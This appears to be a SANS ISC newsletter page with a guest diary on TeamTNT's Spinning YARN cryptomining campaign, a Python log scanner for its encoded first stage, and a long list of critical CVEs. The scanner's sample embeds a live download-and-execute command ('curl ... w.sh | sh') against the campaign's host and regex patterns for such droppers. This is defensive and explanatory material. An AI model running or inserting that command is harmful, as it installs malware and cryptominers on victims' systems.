ISC provides a free analysis and warning service to thousands of Internet users and organizations, and is actively working with Internet Service Providers to fight back against the most malicious attackers. https://isc.sans.edu/about.html
[Guest Diary] A Deep Dive into TeamTNT and Spinning YARN
Published: 2024-12-18.
Last Updated: 2024-12-18 00:04:50 UTC
by James Levija, SANS.edu BACS Student (Version: 1)
Executive Summary
TeamTNT is running a cryptomining campaign dubbed Spinning YARN, which focuses on exploiting Docker, Redis, Hadoop YARN, and Confluence [2]. On November 4th, 2024, my DShield sensor recorded suspicious activity targeting my web server. The attacker attempted to exploit a server-side scripting vulnerability, a flaw that tricks the server into running attacker-supplied commands. The attack originated from IPv4 address 47.93.56.107 and targeted port 8090. The attacker disguised the malicious command by encoding it, which hides its true purpose and helps it evade detection by antivirus software and firewalls.
Decoding the obfuscated command revealed that it makes the victim fetch a malicious file from another site. The dropped file is named "w.sh" [3]. This initial script installs the dependencies needed to run the main payload and then downloads that payload from hxxp://b[.]9-9-8[.]com/brysj. Once downloaded, the payload runs and assesses the environment; it targets Linux distributions and cloud environments. It looks for cloud security tooling and attempts to disable it so that the rest of the code can run unhindered. The malware then establishes persistence by creating keys for communicating with the attacker's server and connects back to it. It also uses techniques to hide itself on the victim's host or in the cloud environment. Finally, it installs a cryptominer that uses the victim's resources for the attacker's gain ...
The impact of this attack extends beyond consuming system resources for cryptocurrency mining. The connection between the victim's machine or cloud environment and the attacker gives the attacker persistent access, which can be abused to run further exploits, steal sensitive data, or launch attacks on other systems. TeamTNT is also known to have created a worm that steals Amazon Web Services (AWS) credentials. This poses significant risks to operational security and data integrity for any organization.
This attack highlights the evolving threats to Linux and cloud environments from sophisticated groups like TeamTNT. Organizations should prioritize securing their infrastructure through regular updates, monitoring for suspicious activity, staying up to date on cyber threat intelligence, and implementing robust defenses against malware and its obfuscation techniques. Collaboration within the cybersecurity community is key to mitigating these ongoing threats ...
Read the full entry: https://isc.sans.edu/diary/Guest+Diary+A+Deep+Dive+into+TeamTNT+and+Spinning+YARN/31530/
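As an added example (not part of the diary, and not TeamTNT's tooling), the following Python script shows how the first stage of the chain described above, an encoded command arriving on port 8090 that decodes to a download-and-execute of w.sh, can be surfaced in web-server logs. It assumes base64 as the encoding (the diary only says the command was encoded), uses a constructed one-request-per-line log format, and embeds a constructed sample payload built from the indicators quoted in the diary (source IP, port, w.sh, the b.9-9-8.com host, refanged only inside the sample). The known-source check is a defanged-IOC lookup; the decoded-payload checks are what catch the same technique coming from a source you have not seen before.

```python
import base64
import re
from dataclasses import dataclass

# Indicators quoted in the diary above. The log format, the sample lines and
# the base64 encoding of the command are assumptions made for this example.
KNOWN_SOURCE_IPS = {"47.93.56.107"}
KNOWN_DROPPER_HOSTS = {"b.9-9-8.com"}
KNOWN_DROPPER_FILES = ("w.sh", "brysj")

# A run of base64 alphabet long enough to hold a shell command; short tokens
# (session ids, short query values) are skipped rather than decoded.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# curl/wget piped into a shell, or followed by chmod/sh on the same line.
DROPPER_RE = re.compile(
    r"\b(?:curl|wget)\b[^|;&\n]*(?:\|\s*(?:ba)?sh\b|;\s*(?:chmod|sh|bash)\b)"
)
URL_HOST_RE = re.compile(r"https?://([^/\s:]+)")
DROPPER_FILE_RE = re.compile(
    r"/(" + "|".join(map(re.escape, KNOWN_DROPPER_FILES)) + r")\b"
)


@dataclass
class Finding:
    src_ip: str
    dst_port: int
    decoded: list   # every base64 run in the request that decoded to text
    reasons: list   # why the line was flagged


def decode_b64_blobs(text):
    """Return every base64 run in `text` that decodes to printable text."""
    decoded = []
    for m in B64_RE.finditer(text):
        blob = m.group(0)
        blob += "=" * (-len(blob) % 4)  # restore padding stripped by the sender
        try:
            raw = base64.b64decode(blob, validate=True).decode("utf-8")
        except ValueError:  # binascii.Error and UnicodeDecodeError both subclass it
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in raw):
            decoded.append(raw)
    return decoded


def analyze_line(line):
    """Constructed log format: '<src_ip> <dst_port> <method> <request>'."""
    parts = line.split(" ", 3)
    if len(parts) != 4:
        return None
    src_ip, dst_port, _method, request = parts
    reasons = []
    if src_ip in KNOWN_SOURCE_IPS:
        reasons.append(f"known attacker source {src_ip}")
    decoded_blobs = decode_b64_blobs(request)
    for decoded in decoded_blobs:
        if DROPPER_RE.search(decoded):
            reasons.append("decoded payload is a download-and-execute chain")
        for host in URL_HOST_RE.findall(decoded):
            if host in KNOWN_DROPPER_HOSTS:
                reasons.append(f"decoded payload fetches from {host}")
        m = DROPPER_FILE_RE.search(decoded)
        if m:
            reasons.append(f"decoded payload names dropper file {m.group(1)}")
    if not reasons:
        return None
    return Finding(src_ip, int(dst_port), decoded_blobs, reasons)


def scan(lines):
    """Run analyze_line over a log and keep only the flagged requests."""
    return [f for f in (analyze_line(line) for line in lines) if f is not None]


# Constructed sample: one request mirroring the chain in the diary, one benign
# request, and one benign request that happens to carry a base64 parameter.
_ENCODED_CMD = base64.b64encode(b"curl -fsSL http://b.9-9-8.com/w.sh | sh").decode()
_BENIGN_B64 = base64.b64encode(b"hello world, nothing to see").decode()
SAMPLE_LOG = [
    f"47.93.56.107 8090 POST /app?cmd={_ENCODED_CMD}",
    "203.0.113.5 443 GET /index.html",
    f"198.51.100.7 8090 GET /search?q={_BENIGN_B64}",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"{finding.src_ip}:{finding.dst_port} -> {finding.decoded!r}")
        for reason in finding.reasons:
            print(f"  - {reason}")
```

Only the first sample line is flagged: it matches on source, on the curl-pipe-sh shape of the decoded command, on the dropper host and on the w.sh filename. The third line carries a base64 value that decodes cleanly but triggers none of the content checks, which is the case a decoder-only rule would false-positive on.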
Apple Updates Everything (iOS, iPadOS, macOS, watchOS, tvOS, visionOS)
Published: 2024-12-11.
Last Updated: 2024-12-11 19:59:25 UTC
by Johannes Ullrich (Version: 1)
Apple today released patches for all of its operating systems. The updates address 46 different vulnerabilities. Many of the vulnerabilities affect more than one operating system. None of the vulnerabilities are labeled as being already exploited ...
Read the full entry: https://isc.sans.edu/diary/Apple+Updates+Everything+iOS+iPadOS+macOS+watchOS+tvOS+visionOS/31514/
Santa’s elves arrive back at the North Pole and are working hard to get ready for the holiday gift-giving season. You’ll get to help Alabaster Snowball, Wombley Cube, and the rest of the gang clean up to restore operations at the North Pole!
"I highly recommend building your infosec skills using the free and incredibly awesome Holiday Hack Challenge by Ed and his team." - SANS Holiday Hack Player
Play for free: https://www.sans.org/mlp/holiday-hack-challenge-2024/
Python Delivering AnyDesk Client as RAT (2024.12.17)
https://isc.sans.edu/diary/Python+Delivering+AnyDesk+Client+as+RAT/31524/
Exploit attempts inspired by recent Struts2 File Upload Vulnerability (CVE-2024-53677, CVE-2023-50164) (2024.12.15)
The list is assembled by pulling recent vulnerabilities from NIST NVD, Microsoft, Twitter mentions of vulnerabilities, ISC Diaries and Podcast, and the CISA list of known exploited vulnerabilities. There are also some unscored, but significant, vulnerabilities at the end. This includes vulnerabilities that have not been added to the NVD yet.
Product: VMware vCenter Server
CVSS Score: 0
** KEV since 2024-11-20 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38812
ISC Podcast: https://isc.sans.edu/podcastdetail/9252
Product: VMware vCenter Server
CVSS Score: 0
** KEV since 2024-11-20 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38813
ISC Podcast: https://isc.sans.edu/podcastdetail/9252
Product: Cleo Harmony
CVSS Score: 0
** KEV since 2024-12-13 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-50623
ISC Podcast: https://isc.sans.edu/podcastdetail/9252
Product: Cleo Harmony
CVSS Score: 9.8
** KEV since 2024-12-17 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55956
NVD References:
- https://support.cleo.com/hc/en-us/articles/28408134019735-Cleo-Product-Security-Advisory-CVE-Pending
- https://support.cleo.com/hc/en-us/articles/28408134019735-Cleo-Product-Security-Update
Product: Microsoft Windows 10 1507
CVSS Score: 7.8
** KEV since 2024-12-10 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-49138
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49138
Product: Adobe ColdFusion 2023
CVSS Score: 0
** KEV since 2024-12-16 **
Product: Adobe Connect
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54032
NVD References: https://helpx.adobe.com/security/products/connect/apsb24-99.html
Product: Apache Struts
CVSS Score: 0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-53677
ISC Diary: https://isc.sans.edu/diary/31520
ISC Podcast: https://isc.sans.edu/podcastdetail/9254
NVD References: https://cwiki.apache.org/confluence/display/WW/S2-067
Product: Apache Struts
CVSS Score: 0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-50164
ISC Diary: https://isc.sans.edu/diary/31520
ISC Podcast: https://isc.sans.edu/podcastdetail/9256
Product: Apache Tomcat
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-50379
NVD References: https://lists.apache.org/thread/y6lj6q1xnp822g6ro70tn19sgtjmr80r
NVD References: http://www.openwall.com/lists/oss-security/2024/12/17/4
Product: Ivanti CSA
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11639
ISC Podcast: https://isc.sans.edu/podcastdetail/9250
NVD References:
CVE-2024-11772 - Ivanti CSA before version 5.0.3 is vulnerable to command injection, enabling a remote authenticated attacker with admin privileges to execute remote code.
Product: Ivanti CSA
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11772
ISC Podcast: https://isc.sans.edu/podcastdetail/9250
NVD References: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Services-Application-CSA-CVE-2024-11639-CVE-2024-11772-CVE-2024-11773
CVE-2024-11773 - Ivanti CSA before version 5.0.3 is vulnerable to SQL injection in the admin web console, enabling a remote attacker with admin privileges to execute arbitrary SQL queries.
Product: Ivanti CSA
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11773
ISC Podcast: https://isc.sans.edu/podcastdetail/9250
NVD References: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Services-Application-CSA-CVE-2024-11639-CVE-2024-11772-CVE-2024-11773
Product: Ivanti Connect Secure
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11633
NVD References: https://forums.ivanti.com/s/article/December-2024-Security-Advisory-Ivanti-Connect-Secure-ICS-and-Ivanti-Policy-Secure-IPS-Multiple-CVEs
Product: Ivanti Connect Secure and Policy Secure
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11634
NVD References: https://forums.ivanti.com/s/article/December-2024-Security-Advisory-Ivanti-Connect-Secure-ICS-and-Ivanti-Policy-Secure-IPS-Multiple-CVEs
Product: Drupal Core
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55636
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55637
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55638
NVD References:
- https://www.drupal.org/sa-core-2024-006
Product: CrushFTP
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-53552
NVD References: https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update
Product: CrushFTP
CVSS Score: 9.6 AtRiskScore 30
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11986
NVD References: https://crushftp.com/crush11wiki/Wiki.jsp?page=Update
Product: MSA Safety FieldServer Gateways
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45493
NVD References:
Product: MSA Safety FieldServer Gateways
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45494
NVD References:
Product: Nette Database
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55586
NVD References:
- https://github.com/CSIRTTrizna/CVE-2024-55586
- https://github.com/nette/database/releases
- https://www.csirt.sk/nette-framework-vulnerability-permits-sql-injection.html
CVE-2024-5660 - Travis hardware vulnerability may allow bypass of Stage-2 translation and/or GPT protection.
Product: Armv8 Arm processors
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-5660
NVD References: https://developer.arm.com/Arm%20Security%20Center/Arm%20CPU%20Vulnerability%20CVE-2024-5660
CVE-2024-54751 - COMFAST CF-WR630AX v2.7.0.2 has a hardcoded password vulnerability in /etc/shadow, enabling root access for attackers.
Product: COMFAST CF-WR630AX
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54751
NVD References: https://colorful-meadow-5b9.notion.site/CF-WR630AX_HardCode_vuln-14bc216a1c3080968161ce15e35fa652?pvs=4
CVE-2024-12286 - MOBATIME Network Master Clock - DTS 4801 allows attackers to use SSH to gain initial access using default credentials.
Product: MOBATIME Network Master Clock - DTS 4801
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-12286
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-24-345-01
CVE-2024-46442 - An issue in the BYD Dilink Headunit System v3.0 to v4.0 allows attackers to bypass authentication via a bruteforce attack.
Product: BYD Dilink Headunit System
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46442
NVD References:
- http://byd.com
- https://github.com/zgsnj123/BYD_headunit_vuls/tree/main
- https://www.bydauto.com.cn/
CVE-2024-11737 - Schneider Electric Modicon Controllers are vulnerable to a denial of service and loss of confidentiality and integrity due to an Improper Input Validation vulnerability when an unauthenticated crafted Modbus packet is received.
Product: Schneider Electric Modicon Controllers M241 / M251 / M258 and Modicon Controllers LMC058 (Programmable Logic Controllers)
CVSS Score: 9.8 AtRiskScore 30
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11737
NVD References: https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-345-03&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-345-03.pdf
CVE-2024-11948 - GFI Archiver is vulnerable to remote code execution through a flaw in the product installer, allowing attackers to execute code without authentication.
Product: GFI Archiver
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11948
NVD References: https://www.zerodayinitiative.com/advisories/ZDI-24-1671/
CVE-2024-45337 - Applications and libraries which misuse the ServerConfig.PublicKeyCallback callback may be susceptible to an authorization bypass.
Product: Golang Cryptography Library
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45337
NVD References:
- https://github.com/golang/crypto/commit/b4f1988a35dee11ec3e05d6bf3e90b695fbd8909
- https://go.dev/cl/635315
- https://go.dev/issue/70779
- https://groups.google.com/g/golang-announce/c/-nPEi39gI4Q/m/cGVPJCqdAQAJ
- https://pkg.go.dev/vuln/GO-2024-3321
- http://www.openwall.com/lists/oss-security/2024/12/11/2
CVE-2024-49112 - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
Product: Microsoft Windows Lightweight Directory Access Protocol (LDAP)
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-49112
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49112
CVE-2024-55884 - Mullvad VPN client is vulnerable to heap-based out-of-bounds writes in exception handling, which can lead to code execution.
Product: Mullvad VPN client
CVSS Score: 9.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55884
NVD References:
- https://github.com/mullvad/mullvadvpn-app/commit/ef6c862071b26023802b00d6e1dc6ca53d1ab3e6
- https://news.ycombinator.com/item?id=42390768
- https://x41-dsec.de/news/2024/12/11/mullvad/
CVE-2024-44241, CVE-2024-44242, CVE-2024-44299 - iOS and iPadOS versions 18.0 and earlier may allow attackers to execute arbitrary code or cause unexpected system termination in DCP firmware due to inadequate bounds checks.
Product: Apple iOS and iPadOS
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44241
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44242
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44299
NVD References: https://support.apple.com/en-us/121563
CVE-2024-54465 - A logic issue in state management, fixed in macOS Sequoia 15.2, could allow an app to elevate privileges.
Product: Apple macOS Sequoia
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54465
NVD References: https://support.apple.com/en-us/121839
CVE-2024-54492 - An attacker in a privileged network position may be able to manipulate network traffic; fixed in macOS Sequoia 15.2, iOS 18.2, iPadOS 18.2, iPadOS 17.7.3, and visionOS 2.2, and mitigated for traffic already protected by HTTPS.
Product: Apple macOS Sequoia
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54492
NVD References:
- https://support.apple.com/en-us/121837
- https://support.apple.com/en-us/121838
Product: Apple macOS Sequoia
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54506
NVD References: https://support.apple.com/en-us/121839
Product: Apple Safari
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54534
NVD References:
- https://support.apple.com/en-us/121837
- https://support.apple.com/en-us/121839
- https://support.apple.com/en-us/121843
- https://support.apple.com/en-us/121844
Product: Node-RED Custom Nodes
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-21574
NVD References:
- https://github.com/ltdrdata/ComfyUI-Manager/commit/ffc095a3e5acc1c404773a0510e6d055a6a72b0e
Product: PHPGurukul Beauty Parlour Management System
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-53480
NVD References:
- https://github.com/sbksibi/CVEs/blob/main/CVE-2024-53480.md
Product: PHPGurukul Online Nurse Hiring System
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54842
NVD References: https://github.com/achchhelalchauhan/phpgurukul/blob/main/SQL%20injection%20ONHP-forgetpass-mobileno.pdf
Product: PHPGurukul Online Nurse Hiring System
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55099
NVD References:
- https://github.com/achchhelalchauhan/phpgurukul/blob/main/SQL%20injection%20ONHP-username.pdf
Product: PHPGurukul Pre-School Enrollment System Project
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54810
NVD References:
Product: PHPGurukul Park Ticketing Management System
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54811
NVD References:
- https://github.com/Santoshcyber1/CVE-wirteup/blob/main/Phpgurukul/Park%20ticket/report%20sql.pdf
Product: Microsoft Update Catalog
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-49147
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49147
Product: XWiki Extension Repository Application
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55662
NVD References:
- https://github.com/xwiki/xwiki-platform/commit/8659f17d500522bf33595e402391592a35a162e8
- https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-j2pq-22jj-4pm5
Product: XWiki Platform
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55877
NVD References:
- https://github.com/xwiki/xwiki-platform/commit/40e1afe001d61eafdf13f3621b4b597a0e58a3e3
- https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-2r87-74cx-2p7c
Product: XWiki Platform
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55879
NVD References:
- https://github.com/xwiki/xwiki-platform/commit/8493435ff9606905a2d913607d6c79862d0c168d
- https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-r279-47wg-chpr
- https://jira.xwiki.org/browse/XWIKI-21207
- https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-wh34-m772-5398
Product: ComfyUI Bmad-Nodes
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-21576
NVD References: https://github.com/bmad4ever/comfyui_bmad_nodes/blob/392af9490cbadf32a1fe92ff820ebabe88c51ee8/cv_nodes.py#L1814
Product: ComfyUI Ace Nodes
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-21577
NVD References: https://github.com/hay86/ComfyUI_AceNodes/blob/5ba01db8a3b7afb8e4aecfaa48823ddeb132bbbb/nodes.py#L1193
Product: http4k
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55875
NVD References:
- https://github.com/http4k/http4k/commit/35297adc6d6aca4951d50d8cdf17ff87a8b19fbc
- https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw
Product: PlexTrac
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11834
NVD References: https://docs.plextrac.com/plextrac-documentation/master/security-advisories#release-2.11.0
Product: Menlo On-Premise Appliance
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-29476
NVD References: https://www.menlosecurity.com/published-security-vulnerabilities
Product: Syncfusion Essential Studio for ASP.NET MVC
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55969
NVD References: https://ej2.syncfusion.com/aspnetmvc/documentation/release-notes/27.1.55?type=all
Product: Chunghwa Telecom TenderDocTransfer
CVSS Score: 9.6
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-12641
NVD References:
Product: Siemens SINEC NMS
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-49775
NVD References: https://cert-portal.siemens.com/productcert/html/ssa-928984.html
Product: Weasis
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55557
NVD References:
- https://apps.microsoft.com/detail/9nhtv46lg4nh?hl=en-us&gl=US
- https://github.com/nroduit/Weasis/releases/tag/v4.5.1
- https://github.com/partywavesec/CVE-2024-55557
- https://www.partywave.site/show/research/CVE-2024-55557%20-%20Weasis%204.5.1
CVE-2024-29671 - NEXTU FLATA AX1500 Router v.1.0.2 is vulnerable to a buffer overflow that allows remote attackers to execute arbitrary code through the POST request handler component.
Product: NEXTU FLATA AX1500 Router
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-29671
NVD References:
- https://ez-net.co.kr/new_2012/customer/download_view.php?cid=&sid=&goods=&cate=&q=Ax1500&seq=228
- https://gist.github.com/laskdjlaskdj12/4afc8b5d75640bd28eaf32de3ceda48a
- https://github.com/laskdjlaskdj12/CVE-2024-29671-POC
CVE-2024-52949 - iptraf-ng 1.2.1 has a stack-based buffer overflow.
Product: iptraf-ng 1.2.1
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-52949
NVD References:
- https://github.com/iptraf-ng/iptraf-ng/releases/tag/v1.2.1
- https://www.gruppotim.it/it/footer/red-team.html
CVE-2024-55085 - GetSimple CMS CE 3.3.19 allows attackers to execute arbitrary code via the template editing function in the background management system.
Product: GetSimple CMS CE
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55085
NVD References:
- https://getsimple-ce.ovh/
- https://tasteful-stamp-da4.notion.site/CVE-2024-55085-15b1e0f227cb80a5aee6faeb820bf7e6
CVE-2024-10205 - Hitachi Ops Center Analyzer and Hitachi Infrastructure Analytics Advisor on Linux, 64 bit are vulnerable to an authentication bypass issue from version 10.0.0-00 through 4.4.0-00.
Product: Hitachi Ops Center Analyzer
CVSS Score: 9.4
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-10205
NVD References: https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2024-151/index.html
CVE-2024-12356 - All BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) versions contain a command injection vulnerability which can be exploited through a malicious client request.
Product: BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS)
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-12356
NVD References:
- https://www.beyondtrust.com/trust-center/security-advisories/bt24-10
- https://www.cve.org/CVERecord?id=CVE-2024-12356
CVE-2024-8972 - Mobil365 Informatics Saha365 App is vulnerable to SQL Injection before 30.09.2024.
Product: Mobil365 Informatics Saha365 App
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8972
NVD References: https://www.usom.gov.tr/bildirim/tr-24-1890
CVE-2024-11015 - The Sign In With Google plugin for WordPress is vulnerable to authentication bypass, allowing unauthenticated attackers to log in as the first user who signed in using Google OAuth.
Product: Sign In With Google plugin
Active Installations: This plugin has been closed as of December 10, 2024 and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11015
NVD References:
- https://plugins.trac.wordpress.org/browser/sign-in-with-google/trunk/src/admin/class-sign-in-with-google-admin.php#L525
- https://www.wordfence.com/threat-intel/vulnerabilities/id/afe894b0-5e91-4aa2-bbd1-1f74274701cf?source=cve
CVE-2024-10124 - The Vayu Blocks plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation and activation, enabling unauthenticated attackers to achieve remote code execution.
Product: Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce
Active Installations: 1,000+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-10124
NVD References:
- https://plugins.trac.wordpress.org/browser/vayu-blocks/trunk/inc/vayu-sites/app.php#L28
- https://plugins.trac.wordpress.org/browser/vayu-blocks/trunk/inc/vayu-sites/app.php#L46
- https://plugins.trac.wordpress.org/browser/vayu-blocks/trunk/inc/vayu-sites/core/class-installation.php#L29
- https://plugins.trac.wordpress.org/changeset/3173408/
- https://plugins.trac.wordpress.org/changeset/3203532/vayu-blocks/tags/1.2.0/inc/vayu-sites/app.php
- https://www.wordfence.com/threat-intel/vulnerabilities/id/81e7ab80-7df2-4ef4-80ee-a11d057151c4?source=cve
CVE-2024-9290 - The Super Backup & Clone - Migrate for WordPress plugin is vulnerable to arbitrary file uploads, allowing unauthenticated attackers to upload files and potentially execute remote code.
Product: Super Backup & Clone - Migrate for WordPress
Active Installations: unknown
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-9290
NVD References:
- https://codecanyon.net/item/super-backup-clone-migrate-for-wordpress/12943030
- https://www.wordfence.com/threat-intel/vulnerabilities/id/7c31d9b3-38b1-49a1-b361-ffe97e02bff0?source=cve
CVE-2022-46838 - JS Help Desk – Best Help Desk & Support Plugin is vulnerable to missing authorization, allowing for exploitation of incorrectly configured access control security levels.
Product: JS Help Desk – Best Help Desk & Support Plugin
Active Installations: 5,000+
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-46838
CVE-2024-54239 - Missing Authorization vulnerability in dugudlabs Eyewear prescription form allows Privilege Escalation.This issue affects Eyewear prescription form: from n/a through 4.0.18.
Product: dugudlabs Eyewear prescription form
Active Installations: This extension has been closed as of December 6, 2024 and is not available for download. The closure is temporary, pending a full review.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54239
CVE-2024-54296 - CoSchool LMS by Codexpert, Inc is vulnerable to Authentication Bypass via an Alternate Path or Channel from version n/a through 1.2.
Product: Codexpert Inc, CoSchool LMS
Active Installations: This plugin has been closed as of November 8, 2024, and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54296
CVE-2024-54297 - vBSSO-lite allows Authentication Bypass via an alternate path or channel in www.vbsso.com versions n/a through 1.4.3.
Product: vBSSO-lite
Active Installations: 6,000+
CVSS Score: 9.8 AtRiskScore 30
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54297
CVE-2024-54361 - Instant Appointment suffers from an SQL Injection vulnerability in versions n/a through 1.2, allowing for improper neutralization of special elements in SQL commands.
Product: outstrip Instant Appointment
Active Installations: This plugin has been closed as of November 5, 2024 and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54361
CVE-2024-54363 - Wp NssUser Register is vulnerable to Incorrect Privilege Assignment, allowing Privilege Escalation in versions from n/a through 1.0.0.
Product: nssTheme Wp NssUser Register
Active Installations: unknown
CVSS Score: 9.8 AtRiskScore 30
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54363
CVE-2024-54367 - Deserialization of Untrusted Data vulnerability in ForumWP allows Object Injection. This issue affects ForumWP: from n/a through 2.1.0.
Product: ForumWP
Active Installations: 1,000+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54367
CVE-2024-54369 - Zita Site Builder versions from n/a through 1.0.2 are vulnerable to Missing Authorization, allowing unauthorized access to functionalities not restricted by ACLs.
Product: ThemeHunk Zita Site Builder
Active Installations: This plugin has been closed as of November 6, 2024 and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54369
CVE-2024-54372 - Cross-Site Request Forgery (CSRF) vulnerability in Sourov Amin Insertify allows Code Injection. This issue affects Insertify: from n/a through 1.1.4.
Product: Sourov Amin Insertify
Active Installations: This plugin has been closed as of October 21, 2024 and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.6
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54372
CVE-2024-55976 - Mike Leembruggen Critical Site Intel is vulnerable to SQL Injection, allowing attackers to manipulate SQL commands from version n/a through 1.0.
Product: Mike Leembruggen Critical Site Intel
Active Installations: unknown
CVSS Score: 9.3
